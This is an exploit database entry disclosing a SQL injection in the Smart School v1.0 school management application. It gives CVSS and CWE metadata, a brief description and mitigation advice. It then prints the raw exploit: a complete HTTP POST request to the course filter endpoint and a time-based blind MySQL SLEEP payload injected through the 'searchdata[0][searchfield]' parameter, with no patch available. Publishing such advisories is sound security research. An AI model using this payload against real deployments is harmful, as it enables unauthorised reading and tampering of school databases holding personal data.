Smart School v1.0 - SQL Injection

vendor:

Smart School

by:

Ahmet Ümit BAYRAM

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Smart School

Affected Version From: Smart School v1.0

Affected Version To: Smart School v1.0

Patch Exists: NO

Related CWE:

CPE: a:codecanyon:smart_school:1.0

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2023

Smart School v1.0 – SQL Injection

The Smart School v1.0 application is vulnerable to SQL injection. This vulnerability allows an attacker to execute arbitrary SQL queries, potentially compromising the integrity and confidentiality of the database. By exploiting the 'searchdata[0][searchfield]' parameter, an attacker can inject malicious SQL code and manipulate the database.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques. Additionally, prepared statements or parameterized queries should be used to prevent SQL injection attacks. Regular security audits and updates should also be performed to identify and patch any potential vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: Smart School v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/smart-school-school-management-system/19426018
# Demo Site: https://demo.smart-school.in
# Tested on: Kali Linux
# CVE: N/A


### Request ###

POST /course/filterRecords/ HTTP/1.1
Host: localhost
Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://localhost
Referer: https://localhost/course/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1


### Parameter & Payloads ###

Parameter: searchdata[0][searchfield] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload:
searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id
AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)--
hAHp&searchdata[0][searchvalue]=1